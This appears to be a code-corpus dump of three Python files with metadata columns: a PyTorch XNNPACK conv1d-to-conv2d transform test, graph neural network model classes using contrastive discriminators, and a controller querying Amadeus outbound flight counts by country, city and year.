scripted_model = torch.jit.trace(module_instance, input_data)
scripted_model.eval()
ref_result = scripted_model(input_data)
torch._C._jit_pass_transform_conv1d_to_conv2d(scripted_model._c)
optimized_scripted_model = optimize_for_mobile(scripted_model)
buffer = io.BytesIO()
torch.jit.save(scripted_model, buffer)
buffer.seek(0)
deserialized_scripted_model = torch.jit.load(buffer)
for pattern, v in pattern_count_transformed_map.items():
if (v == 0):
FileCheck().check(pattern).run(deserialized_scripted_model.graph)
elif (v == -1):
FileCheck().check_not(pattern).run(deserialized_scripted_model.graph)
else:
FileCheck().check_count(pattern, v, exactly=True).run(deserialized_scripted_model.graph)
transformed_result = deserialized_scripted_model(input_data)
torch.testing.assert_allclose(ref_result, transformed_result, rtol=1e-2, atol=1e-3)
optimized_buffer = io.BytesIO()
torch.jit.save(optimized_scripted_model, optimized_buffer)
optimized_buffer.seek(0)
deserialized_optimized_scripted_model = torch.jit.load(optimized_buffer)
for pattern, v in pattern_count_optimized_map.items():
if (v == 0):
FileCheck().check(pattern).run(deserialized_optimized_scripted_model.graph)
elif (v == -1):
FileCheck().check_not(pattern).run(deserialized_optimized_scripted_model.graph)
else:
FileCheck().check_count(pattern, v, exactly=True).run(deserialized_optimized_scripted_model.graph)
xnnpack_result = deserialized_optimized_scripted_model(input_data)
torch.testing.assert_allclose(ref_result, xnnpack_result, rtol=1e-2, atol=1e-3)
def test_conv1d_basic(self):
batch_size_list = range(1, 3)
input_channels_per_group_list = range(10, 12)
width_list = range(10, 12)
output_channels_per_group_list = range(10, 12)
groups_list = range(1, 3)
kernel_list = range(1, 4)
stride_list = range(1, 3)
padding_list = range(0, 3)
dilation_list = range(1, 3)
for hparams in itertools.product(batch_size_list,
input_channels_per_group_list,
width_list,
output_channels_per_group_list,
groups_list,
kernel_list,
stride_list,
padding_list,
dilation_list):
batch_size, input_channels_per_group, width, output_channels_per_group, \
groups, kernel, stride, padding, dilation = hparams
input_channels = input_channels_per_group * groups
output_channels = output_channels_per_group * groups
conv_weight_shape = (output_channels, input_channels_per_group, kernel)
conv_bias_shape = (output_channels)
class Conv1D(torch.nn.Module):
def __init__(self):
super(Conv1D, self).__init__()
self.weight = torch.nn.Parameter(torch.Tensor(torch.rand(conv_weight_shape)), requires_grad=False)
self.bias = torch.nn.Parameter(torch.Tensor(torch.rand(conv_bias_shape)), requires_grad=False)
self.stride = stride
self.padding = padding
self.dilation = dilation
self.groups = groups
def forward(self, x):
return F.conv1d(x, self.weight, self.bias,
self.stride, self.padding, self.dilation, self.groups)
data_shape = (batch_size, input_channels, width)
pattern_count_transformed_map = {"Tensor = aten::conv1d": -1,
"Tensor = aten::conv2d": 1}
pattern_count_optimized_map = {"Tensor = aten::conv1d": -1,
"Tensor = aten::conv2d": -1,
"prepacked::conv2d_clamp_prepack" : -1,
"prepacked::conv2d_clamp_run": 1}
TestXNNPACKConv1dTransformPass.validate_transform_conv1d_to_conv2d(Conv1D(),
pattern_count_transformed_map,
pattern_count_optimized_map,
data_shape)
# See https://github.com/pytorch/pytorch/issues/46066
@slowTest
def test_conv1d_with_relu_fc(self):
batch_size_list = range(1, 3)
input_channels_per_group_list = range(10, 12)
width_list = range(10, 12)
output_channels_per_group_list = range(10, 12)
groups_list = range(1, 3)
kernel_list = range(1, 4)
stride_list = range(1, 3)
padding_list = range(0, 3)
dilation_list = range(1, 3)
output_features_list = range(1, 3)
for hparams in itertools.product(batch_size_list,
input_channels_per_group_list,
width_list,
output_channels_per_group_list,
groups_list,
kernel_list,
stride_list,
padding_list,
dilation_list,
output_features_list):
batch_size, input_channels_per_group, width, output_channels_per_group, \
groups, kernel, stride, padding, dilation, output_features = hparams
input_channels = input_channels_per_group * groups
output_channels = output_channels_per_group * groups
conv_weight_shape = (output_channels, input_channels_per_group, kernel)
conv_bias_shape = (output_channels)
conv_output_width = int((width + 2 * padding - dilation * (kernel - 1) - 1) / stride) + 1
fc_weight_shape = (output_features, output_channels * conv_output_width)
fc_bias_shape = (output_features)
class Net(torch.nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv_weight = torch.nn.Parameter(torch.Tensor(torch.rand(conv_weight_shape)), requires_grad=False)
self.conv_bias = torch.nn.Parameter(torch.Tensor(torch.rand(conv_bias_shape)), requires_grad=False)
self.stride = stride
self.padding = padding
self.dilation = dilation
self.groups = groups
self.fc_weight = torch.nn.Parameter(torch.Tensor(torch.rand(fc_weight_shape)), requires_grad=False)
self.fc_bias = torch.nn.Parameter(torch.Tensor(torch.rand(fc_bias_shape)), requires_grad=False)
def forward(self, x):
x = F.conv1d(x, self.conv_weight, self.conv_bias,
self.stride, self.padding, self.dilation, self.groups)
x = F.relu(x)
x = x.view(x.size(0), -1)
x = F.linear(x, self.fc_weight, self.fc_bias)
return x
data_shape = (batch_size, input_channels, width)
pattern_count_transformed_map = {"Tensor = aten::conv1d": -1,
"Tensor = aten::conv2d": 1}
pattern_count_optimized_map = {"Tensor = aten::conv1d": -1,
"Tensor = aten::conv2d": -1,
"prepacked::conv2d_clamp_prepack" : -1,
"prepacked::conv2d_clamp_run": 1}
TestXNNPACKConv1dTransformPass.validate_transform_conv1d_to_conv2d(Net(),
pattern_count_transformed_map,
pattern_count_optimized_map,
data_shape)
if __name__ == "__main__":
run_tests()
| 48.562556
| 124
| 0.573722
| 5,840
| 53,953
| 4.994178
| 0.046747
| 0.026058
| 0.032915
| 0.023041
| 0.898649
| 0.873689
| 0.845574
| 0.81835
| 0.785881
| 0.768155
| 0
| 0.017979
| 0.338165
| 53,953
| 1,110
| 125
| 48.606306
| 0.798813
| 0.013178
| 0
| 0.766734
| 0
| 0
| 0.046318
| 0.026231
| 0
| 0
| 0
| 0
| 0.015213
| 1
| 0.054767
| false
| 0.027383
| 0.013185
| 0.011156
| 0.112576
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
076db9b5b653f663eada0a058dc3892dba3e00ab
| 15,342
|
py
|
Python
|
model/models.py
|
dingdanhao110/Conch
|
befa022dd08590062213ef2a17d0cf697fa26ec4
|
[
"MIT"
] | 8
|
2020-12-07T08:45:31.000Z
|
2022-03-05T05:35:56.000Z
|
model/models.py
|
dingdanhao110/Conch
|
befa022dd08590062213ef2a17d0cf697fa26ec4
|
[
"MIT"
] | null | null | null |
model/models.py
|
dingdanhao110/Conch
|
befa022dd08590062213ef2a17d0cf697fa26ec4
|
[
"MIT"
] | 2
|
2021-07-30T11:33:34.000Z
|
2021-10-19T02:40:02.000Z
|
import torch
import torch.nn as nn
from torch.nn import functional as F
from model.layers import BaseConch,BaseConchNc,BaseConchRd, AvgReadout, Discriminator, BaseConchGS, CLING_HAN
class conch_dgi(nn.Module):
def __init__(self, n_mp,
problem,
prep_len,
n_head,
node_layer_specs,
edge_layer_specs,
aggregator_class,
mpaggr_class,
edge_aggr_class,
prep_class,
sampler_class,
dropout,
batchnorm,
attn_dropout=0,
bias=False,):
super(conch_dgi, self).__init__()
self.dropout = dropout
self.gcn = BaseConch(
n_mp,
problem,
prep_len,
n_head,
node_layer_specs,
edge_layer_specs,
aggregator_class,
mpaggr_class,
edge_aggr_class,
prep_class,
sampler_class,
dropout,
batchnorm,
attn_dropout,
bias)
self.read = AvgReadout()
self.sigm = nn.Sigmoid()
self.disc = Discriminator(self.gcn.output_dim)
self.mp_agg = mpaggr_class(
self.gcn.output_dim, n_head=n_mp + int(bias), dropout=dropout, batchnorm=batchnorm, )
self.fc = nn.Sequential(*[
# nn.Linear(self.mp_agg.output_dim, 32, bias=True),
# nn.ReLU(), nn.Dropout(self.dropout),
# nn.Linear(32, problem.n_classes, bias=True),
nn.Linear(self.mp_agg.output_dim, problem.n_classes, bias=True),
])
def forward(self, feat1, feat2, msk, samp_bias1, samp_bias2, get_embed=False):
h_1 = self.gcn(feat1)
# h_1 = F.normalize(h_1, dim=2) #normalize before attention
output, weights = self.mp_agg(h_1)
output = self.fc(output)
preds = F.dropout(output, self.dropout, training=self.training)
if get_embed:
return preds
c = self.read(h_1, msk)
c = self.sigm(c)
h_2 = self.gcn(feat2)
reg = self.disc(c, h_1, h_2, samp_bias1, samp_bias2)
return preds, weights, reg
def get_embed(self, feat1):
h_1 = self.gcn(feat1)
output, _ = self.mp_agg(h_1)
output = self.fc(output)
return output
class conch_dgi2(nn.Module):
def __init__(self, n_mp,
problem,
prep_len,
n_head,
node_layer_specs,
edge_layer_specs,
aggregator_class,
mpaggr_class,
edge_aggr_class,
prep_class,
sampler_class,
dropout,
batchnorm,
shuffle=False,
attn_dropout=0,
bias=False,):
super(conch_dgi2, self).__init__()
self.dropout = dropout
self.shuffle = shuffle
self.gcn = BaseConch(
n_mp,
problem,
prep_len,
n_head,
node_layer_specs,
edge_layer_specs,
aggregator_class,
mpaggr_class,
edge_aggr_class,
prep_class,
sampler_class,
dropout,
batchnorm,
attn_dropout,
bias)
self.read = AvgReadout()
self.sigm = nn.Sigmoid()
self.mp_agg = mpaggr_class(
self.gcn.output_dim, n_head=n_mp + int(bias), dropout=dropout, batchnorm=batchnorm, )
self.disc = Discriminator(self.mp_agg.output_dim)
self.fc = nn.Sequential(*[
# nn.Linear(self.mp_agg.output_dim, 32, bias=True),
# nn.ReLU(), nn.Dropout(self.dropout),
# nn.Linear(32, problem.n_classes, bias=True),
nn.Linear(self.mp_agg.output_dim, problem.n_classes, bias=True),
])
def forward(self, feat1, feat2, msk, samp_bias1, samp_bias2, get_embed=None):
h_1 = self.gcn(feat1,shuffle=False)
# h_1 = F.normalize(h_1, dim=2) #normalize before attention
h_1, weights = self.mp_agg(h_1)
output = self.fc(h_1)
preds = F.dropout(output, self.dropout, training=self.training)
if get_embed=='embed':
return h_1
if get_embed=='pred':
return output
c = self.read(h_1, msk)
c = self.sigm(c)
h_2 = self.gcn(feat2, shuffle=self.shuffle)
h_2, _ = self.mp_agg(h_2)
reg = self.disc(c, h_1, h_2, samp_bias1, samp_bias2)
return preds, None, reg
def get_embed(self, feat1):
h_1 = self.gcn(feat1)
output, _ = self.mp_agg(h_1)
output = self.fc(output)
return output
class conch_dgi_gs(nn.Module):
def __init__(self, n_mp,
problem,
prep_len,
n_head,
node_layer_specs,
edge_layer_specs,
aggregator_class,
mpaggr_class,
edge_aggr_class,
prep_class,
sampler_class,
dropout,
batchnorm,
shuffle=False,
attn_dropout=0,
bias=False,):
super(conch_dgi_gs, self).__init__()
self.dropout = dropout
self.shuffle = shuffle
self.gcn = BaseConchGS(
n_mp,
problem,
prep_len,
n_head,
node_layer_specs,
edge_layer_specs,
aggregator_class,
mpaggr_class,
edge_aggr_class,
prep_class,
sampler_class,
dropout,
batchnorm,
attn_dropout,
bias)
self.read = AvgReadout()
self.sigm = nn.Sigmoid()
self.mp_agg = mpaggr_class(
self.gcn.output_dim, n_head=n_mp + int(bias), dropout=dropout, batchnorm=batchnorm, )
self.disc = Discriminator(self.mp_agg.output_dim)
self.fc = nn.Sequential(*[
# nn.Linear(self.mp_agg.output_dim, 32, bias=True),
# nn.ReLU(), nn.Dropout(self.dropout),
# nn.Linear(32, problem.n_classes, bias=True),
nn.Linear(self.mp_agg.output_dim, problem.n_classes, bias=True),
])
def forward(self, ids, feat1, feat2, msk, samp_bias1, samp_bias2, get_embed=None):
h_1 = self.gcn(ids,feat1,shuffle=False)
# h_1 = F.normalize(h_1, dim=2) #normalize before attention
h_1, weights = self.mp_agg(h_1)
output = self.fc(h_1)
preds = F.dropout(output, self.dropout, training=self.training)
if get_embed=='embed':
return h_1
if get_embed=='pred':
return output
c = self.read(h_1, msk)
c = self.sigm(c)
h_2 = self.gcn(ids,feat2, shuffle=self.shuffle)
h_2, _ = self.mp_agg(h_2)
reg = self.disc(c, h_1, h_2, samp_bias1, samp_bias2)
return preds, None, reg
def get_embed(self, ids, feat1):
h_1 = self.gcn(ids,feat1)
output, _ = self.mp_agg(h_1)
output = self.fc(output)
return output
class hdgi_gs(nn.Module):
def __init__(self, n_mp,
problem,
prep_len,
n_head,
node_layer_specs,
edge_layer_specs,
aggregator_class,
mpaggr_class,
edge_aggr_class,
prep_class,
sampler_class,
dropout,
batchnorm,
shuffle=False,
attn_dropout=0,
bias=False,):
super(hdgi_gs, self).__init__()
self.dropout = dropout
self.shuffle = shuffle
self.gcn = CLING_HAN(
n_mp,
problem,
prep_len,
n_head,
node_layer_specs,
edge_layer_specs,
aggregator_class,
mpaggr_class,
edge_aggr_class,
prep_class,
sampler_class,
dropout,
batchnorm,
attn_dropout,
bias)
self.read = AvgReadout()
self.sigm = nn.Sigmoid()
self.mp_agg = mpaggr_class(
self.gcn.output_dim, n_head=n_mp + int(bias), dropout=dropout, batchnorm=batchnorm, )
self.disc = Discriminator(self.mp_agg.output_dim)
self.fc = nn.Sequential(*[
# nn.Linear(self.mp_agg.output_dim, 32, bias=True),
# nn.ReLU(), nn.Dropout(self.dropout),
# nn.Linear(32, problem.n_classes, bias=True),
nn.Linear(self.mp_agg.output_dim, problem.n_classes, bias=True),
])
def forward(self, ids, feat1, feat2, msk, samp_bias1, samp_bias2, get_embed=None):
h_1 = self.gcn(ids,feat1)
# h_1 = F.normalize(h_1, dim=2) #normalize before attention
h_1, weights = self.mp_agg(h_1)
output = self.fc(h_1)
preds = F.dropout(output, self.dropout, training=self.training)
if get_embed=='embed':
return h_1
if get_embed=='pred':
return output
c = self.read(h_1, msk)
c = self.sigm(c)
h_2 = self.gcn(ids,feat2)
h_2, _ = self.mp_agg(h_2)
reg = self.disc(c, h_1, h_2, samp_bias1, samp_bias2)
return preds, None, reg
def get_embed(self, ids, feat1):
h_1 = self.gcn(ids,feat1)
output, _ = self.mp_agg(h_1)
output = self.fc(output)
return output
class conch_nc(nn.Module):
def __init__(self, n_mp,
problem,
prep_len,
n_head,
node_layer_specs,
edge_layer_specs,
aggregator_class,
mpaggr_class,
edge_aggr_class,
prep_class,
sampler_class,
dropout,
batchnorm,
shuffle=False,
attn_dropout=0,
bias=False,):
super(conch_nc, self).__init__()
self.dropout = dropout
self.gcn = BaseConchNc(
n_mp,
problem,
prep_len,
n_head,
node_layer_specs,
edge_layer_specs,
aggregator_class,
mpaggr_class,
edge_aggr_class,
prep_class,
sampler_class,
dropout,
batchnorm,
attn_dropout,
bias)
# self.read = AvgReadout()
# self.sigm = nn.Sigmoid()
# self.disc = Discriminator(self.gcn.output_dim)
self.mp_agg = mpaggr_class(
self.gcn.output_dim, n_head=n_mp + int(bias), dropout=dropout, batchnorm=batchnorm, )
self.fc = nn.Sequential(*[
# nn.Linear(self.mp_agg.output_dim, 32, bias=True),
# nn.ReLU(), nn.Dropout(self.dropout),
# nn.Linear(32, problem.n_classes, bias=True),
nn.Linear(self.mp_agg.output_dim, problem.n_classes, bias=True),
])
self.shuffle = shuffle
def forward(self, feat1, feat2, msk, samp_bias1, samp_bias2, get_embed=None):
h_1 = self.gcn(feat1)
# h_1 = F.normalize(h_1, dim=2) #normalize before attention
h_1, weights = self.mp_agg(h_1)
output = self.fc(h_1)
preds = F.dropout(output, self.dropout, training=self.training)
if get_embed=='embed':
return h_1
if get_embed=='pred':
return output
c = self.read(h_1, msk)
c = self.sigm(c)
h_2 = self.gcn(feat2)
h_2, _ = self.mp_agg(h_2)
reg = self.disc(c, h_1, h_2, samp_bias1, samp_bias2)
return preds, weights, reg
def get_embed(self, feat1):
h_1 = self.gcn(feat1)
h_1, weights = self.mp_agg(h_1)
# output = self.fc(output)
return h_1
def get_predict(self, feat1):
h_1 = self.gcn(feat1)
h_1, weights = self.mp_agg(h_1)
output = self.fc(output)
return output
class conch_rd(nn.Module):
def __init__(self, n_mp,
problem,
prep_len,
n_head,
node_layer_specs,
edge_layer_specs,
aggregator_class,
mpaggr_class,
edge_aggr_class,
prep_class,
sampler_class,
dropout,
batchnorm,
K,
shuffle = False,
attn_dropout=0,
bias=False,):
super(conch_rd, self).__init__()
self.dropout = dropout
self.gcn = BaseConchRd(
n_mp,
problem,
prep_len,
n_head,
node_layer_specs,
edge_layer_specs,
aggregator_class,
mpaggr_class,
edge_aggr_class,
prep_class,
sampler_class,
dropout,
batchnorm,
K,
attn_dropout,
bias)
self.read = AvgReadout()
self.sigm = nn.Sigmoid()
self.disc = Discriminator(self.gcn.output_dim)
self.mp_agg = mpaggr_class(
self.gcn.output_dim, n_head=n_mp + int(bias), dropout=dropout, batchnorm=batchnorm, )
self.fc = nn.Sequential(*[
# nn.Linear(self.mp_agg.output_dim, 32, bias=True),
# nn.ReLU(), nn.Dropout(self.dropout),
# nn.Linear(32, problem.n_classes, bias=True),
nn.Linear(self.mp_agg.output_dim, problem.n_classes, bias=True),
])
self.shuffle = shuffle
def forward(self, feat1, feat2, msk, samp_bias1, samp_bias2, get_embed=None):
h_1 = self.gcn(feat1,shuffle=False)
# h_1 = F.normalize(h_1, dim=2) #normalize before attention
h_1, weights = self.mp_agg(h_1)
output = self.fc(h_1)
preds = F.dropout(output, self.dropout, training=self.training)
if get_embed:
return preds
c = self.read(h_1, msk)
c = self.sigm(c)
h_2 = self.gcn(feat2,shuffle=self.shuffle)
h_2, _ = self.mp_agg(h_2)
reg = self.disc(c, h_1, h_2, samp_bias1, samp_bias2)
return preds, weights, reg
def get_embed(self, feat1):
h_1 = self.gcn(feat1)
output, _ = self.mp_agg(h_1)
output = self.fc(output)
return output
| 29.447217
| 109
| 0.499935
| 1,742
| 15,342
| 4.132606
| 0.053961
| 0.018614
| 0.048757
| 0.025003
| 0.964023
| 0.964023
| 0.964023
| 0.951243
| 0.947632
| 0.941659
| 0
| 0.020843
| 0.408943
| 15,342
| 521
| 110
| 29.447217
| 0.773048
| 0.081802
| 0
| 0.932292
| 0
| 0
| 0.002562
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.049479
| false
| 0
| 0.010417
| 0
| 0.135417
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
078226e84933638e7c878d75bd643394abf879b0
| 10,593
|
py
|
Python
|
controllers/vuelos salientes amadeus_controller.py
|
SergioCMDev/Busines-Inteligence-applied-to-tourism
|
61834a46fce22453e94b7bbdf8d4ecdcf128285a
|
[
"Apache-2.0"
] | null | null | null |
controllers/vuelos salientes amadeus_controller.py
|
SergioCMDev/Busines-Inteligence-applied-to-tourism
|
61834a46fce22453e94b7bbdf8d4ecdcf128285a
|
[
"Apache-2.0"
] | null | null | null |
controllers/vuelos salientes amadeus_controller.py
|
SergioCMDev/Busines-Inteligence-applied-to-tourism
|
61834a46fce22453e94b7bbdf8d4ecdcf128285a
|
[
"Apache-2.0"
] | null | null | null |
from ..DB.Repositorio_Vuelos_Salientes_Amadeus import BDRepositorioVuelosSalientesAmadeus as DBRepository
from ..Utilidades.Conversores import Conversores as Conversor
def obtener_cantidad_anual(PaisOrigen, AnioInicio, AnioFin): #OK
"""
Dado un pais origen obtiene la cantidad de vuelos que salen de dicho pais durante un rango de años
Dado un pais origen obtiene la cantidad de vuelos que salen de dicho pais durante un rango de años
:param PaisOrigen: Pais del que salen los vuelos
:type PaisOrigen: str
:param AnioInicio: Anio Inicio
:type AnioInicio: int
:param AnioFin: Anio Fin
:type AnioFin: int
:rtype: None
"""
conversor = Conversor()
repository = DBRepository()
cursor, labels = repository.ObtenerDatosVuelosSalientesAmadeusAnualmenteDadoPaisOrigenAnioMinMax(PaisOrigen, AnioInicio, AnioFin)
arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
##Mostrar JSON Extendido
matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
retval = conversor.ObtenerDataJSONExtendido(matriz)
return retval
##Mostrar JSON Reducido
# retval = conversor.convertirAJson(arrayTuplas)
# return retval
def obtener_cantidad_ciudad_mensual_rango_anios(PaisOrigen, CiudadOrigen, AnioInicio, AnioFin): #OK
"""
Dado un pais origen y una ciudad origen obtiene la cantidad de vuelos que salen de dicha ciudad durante un rango de años organizado mensualmente
Dado un pais origen y una ciudad origen obtiene la cantidad de vuelos que salen de dicha ciudad durante un rango de años organizado mensualmente
:param PaisOrigen: Pais del que salen los vuelos
:type PaisOrigen: str
:param CiudadOrigen: Ciudad de la que salen los vuelos
:type CiudadOrigen: str
:param AnioInicio: Anio Inicio
:type AnioInicio: int
:param AnioFin: Anio Fin
:type AnioFin: int
:rtype: None
"""
conversor = Conversor()
repository = DBRepository()
cursor, labels = repository.ObtenerDatosVuelosSalientesAmadeusMensualmenteDadoPaisOrigenCiudadOrigenAnioMinMax(PaisOrigen, CiudadOrigen, AnioInicio, AnioFin)
arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
# print(arrayTuplas)
##Mostrar JSON Extendido
matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
# print(arrayTuplas)
retval = conversor.ObtenerDataJSONExtendido(matriz)
return retval
##Mostrar JSON Reducido
# retval = conversor.convertirAJson(arrayTuplas)
# return retval
def obtener_cantidad_ciudad_mes_rango_anios(PaisOrigen, CiudadOrigen, Mes, AnioInicio, AnioFin): #OK
"""
Dado un pais origen y una ciudad origen obtiene la cantidad de vuelos que salen de dicha ciudad durante un rango de años durante un mes
Dado un pais origen y una ciudad origen obtiene la cantidad de vuelos que salen de dicha ciudad durante un rango de años durante un mes
:param PaisOrigen: Pais del que salen los vuelos
:type PaisOrigen: str
:param CiudadOrigen: Ciudad de la que salen los vuelos
:type CiudadOrigen: str
:param Mes: Mes
:type Mes: str
:param AnioInicio: Anio Inicio
:type AnioInicio: int
:param AnioFin: Anio Fin
:type AnioFin: int
:rtype: None
"""
conversor = Conversor()
repository = DBRepository()
cursor, labels = repository.ObtenerDatosVuelosSalientesAmadeusEnUnMesDadoPaisOrigenCiudadOrigenMesAnioMinMax(PaisOrigen, CiudadOrigen, Mes, AnioInicio, AnioFin)
arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
##Mostrar JSON Extendido
matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
retval = conversor.ObtenerDataJSONExtendido(matriz)
return retval
##Mostrar JSON Reducido
# retval = conversor.convertirAJson(arrayTuplas)
# return retval
def obtener_cantidad_ciudades_mensual_rango_anios(PaisOrigen, AnioInicio, AnioFin): #OK
"""
Dado un pais origen obtiene la cantidad de vuelos que salen de dicho pais y las ciudades hacia las que se dirigen durante un rango de años dividiendo por meses
Dado un pais origen obtiene la cantidad de vuelos que salen de dicho pais y las ciudades hacia las que se dirigen durante un rango de años dividiendo por meses
:param PaisOrigen: Pais del que salen los vuelos
:type PaisOrigen: str
:param AnioInicio: Anio Inicio
:type AnioInicio: int
:param AnioFin: Anio Fin
:type AnioFin: int
:rtype: None
"""
conversor = Conversor()
repository = DBRepository()
cursor, labels = repository.ObtenerDatosVuelosSalientesAmadeusDadoPaisOrigenAnioMinMaxSeparadoPorCiudadesMensualmente(PaisOrigen, AnioInicio, AnioFin)
arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
##Mostrar JSON Extendido
# matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
# retval = conversor.ObtenerDataJSONExtendido(matriz)
#
# return retval
##Mostrar JSON Reducido
retval = conversor.convertirAJson(arrayTuplas)
return retval
def obtener_cantidad_ciudades_rango_anios(PaisOrigen, AnioInicio, AnioFin): #OK
"""
Dado un pais origen obtiene la cantidad de vuelos que salen de dicho pais y las ciudades hacia las que se dirigen durante un rango de años
Dado un pais origen obtiene la cantidad de vuelos que salen de dicho pais y las ciudades hacia las que se dirigen durante un rango de años
:param PaisOrigen: Pais del que salen los vuelos
:type PaisOrigen: str
:param AnioInicio: Anio Inicio
:type AnioInicio: int
:param AnioFin: Anio Fin
:type AnioFin: int
:rtype: None
"""
conversor = Conversor()
repository = DBRepository()
cursor, labels = repository.ObtenerDatosVuelosSalientesAmadeusDadoPaisOrigenAnioMinMaxSeparadoPorCiudades(PaisOrigen, AnioInicio, AnioFin)
arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
##Mostrar JSON Extendido
# matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
# retval = conversor.ObtenerDataJSONExtendido(matriz)
#
# return retval
##Mostrar JSON Reducido
retval = conversor.convertirAJson(arrayTuplas)
return retval
def obtener_cantidad_mensualmente_en_anio(PaisOrigen, Anio): #OK
"""
Dado un pais origen y un anio obtiene la cantidad de vuelos que salen de dicho pais durante ese año de forma mensual
Dado un pais origen y un anio obtiene la cantidad de vuelos que salen de dicho pais durante ese año de forma mensual
:param PaisOrigen: Pais del que salen los vuelos
:type PaisOrigen: str
:param Anio: Anio
:type Anio: int
:rtype: None
"""
conversor = Conversor()
repository = DBRepository()
cursor, labels = repository.ObtenerDatosVuelosSalientesAmadeusEnUnAnioDadoPaisOrigenAnioMensualmente(PaisOrigen, Anio)
arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
##Mostrar JSON Extendido
matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
retval = conversor.ObtenerDataJSONExtendido(matriz)
return retval
##Mostrar JSON Reducido
# retval = conversor.convertirAJson(arrayTuplas)
# return retval
def obtener_cantidad_mes_en_rango_anios(PaisOrigen, Mes, AnioInicio, AnioFin): #OK
"""
Dado un pais origen, un mes y un rango de años obtiene la cantidad de vuelos salientes durante ese rango de años en ese mes
Dado un pais origen, un mes y un rango de años obtiene la cantidad de vuelos salientes durante ese rango de años en ese mes
:param PaisOrigen: Pais del que salen los vuelos
:type PaisOrigen: str
:param Mes: Mes
:type Mes: str
:param AnioInicio: Anio Inicio
:type AnioInicio: int
:param AnioFin: AnioFin
:type AnioFin: int
:rtype: None
"""
conversor = Conversor()
repository = DBRepository()
cursor, labels = repository.ObtenerDatosVuelosSalientesAmadeusAnualmenteEnUnMesDadoPaisOrigenMesAnioMinMax(PaisOrigen, Mes, AnioInicio, AnioFin)
arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
##Mostrar JSON Extendido
matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
retval = conversor.ObtenerDataJSONExtendido(matriz)
return retval
##Mostrar JSON Reducido
# retval = conversor.convertirAJson(arrayTuplas)
# return retval
def obtener_cantidad_vuelos_salientes_ciudades_en_anio(PaisOrigen, Anio): #OK
"""
Dado un pais origen y un anio obtiene la cantidad de vuelos que salen de dicho pais durante ese año dividiendo por ciudades
Dado un pais origen y un anio obtiene la cantidad de vuelos que salen de dicho pais durante ese año dividiendo por ciudades
:param PaisOrigen: Pais del que salen los vuelos
:type PaisOrigen: str
:param Anio: Anio
:type Anio: int
:rtype: None
"""
conversor = Conversor()
repository = DBRepository()
cursor, labels = repository.ObtenerDatosVuelosSalientesAmadeusEnUnAnioDadoPaisOrigenAnioSeparandoPorCiudades(PaisOrigen, Anio)
arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
##Mostrar JSON Extendido
matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
retval = conversor.ObtenerDataJSONExtendido(matriz)
return retval
##Mostrar JSON Reducido
# retval = conversor.convertirAJson(arrayTuplas)
# return retval
def obtener_cantidad_vuelos_salientes_ciudad_rango_anios(PaisOrigen, CiudadOrigen, AnioInicio, AnioFin): #OK
"""
Dado un pais origen y una ciudad origen obtiene la cantidad de vuelos que salen de dicha ciudad durante un rango de años
Dado un pais origen y una ciudad origen obtiene la cantidad de vuelos que salen de dicha ciudad durante un rango de años
:param PaisOrigen: Pais del que salen los vuelos
:type PaisOrigen: str
:param CiudadOrigen: Ciudad de la que salen los vuelos
:type CiudadOrigen: str
:param AnioInicio: Anio Inicio
:type AnioInicio: int
:param AnioFin: Anio Fin
:type AnioFin: int
:rtype: None
"""
conversor = Conversor()
repository = DBRepository()
cursor, labels = repository.ObtenerDatosVuelosSalientesAmadeusDadoPaisOrigenCiudadOrigenAnioMinMax(PaisOrigen, CiudadOrigen, AnioInicio, AnioFin)
arrayTuplas = conversor.ConvertirCursorToTuplas(cursor)
##Mostrar JSON Extendido
matriz, lista = conversor.ConvertirTuplasToMatriz(arrayTuplas, labels)
retval = conversor.ObtenerDataJSONExtendido(matriz)
return retval
##Mostrar JSON Reducido
# retval = conversor.convertirAJson(arrayTuplas)
# return retval
| 34.731148
| 164
| 0.750212
| 1,190
| 10,593
| 6.640336
| 0.078151
| 0.028347
| 0.022779
| 0.036446
| 0.874336
| 0.868767
| 0.868767
| 0.868767
| 0.851683
| 0.841559
| 0
| 0
| 0.192863
| 10,593
| 304
| 165
| 34.845395
| 0.924211
| 0.505051
| 0
| 0.722222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.027778
| 0
| 0.277778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
07d39af11674ef36cd4dfaec8384cc06aa08ab04
| 32,782
|
py
|
Python
|
src/hapPyTango/Tango_skel/__init__.py
|
mguijarr/hapPyTango
|
2506c8e83d93fbd2c0a0115983489d59c74caa2f
|
[
"MIT"
] | 1
|
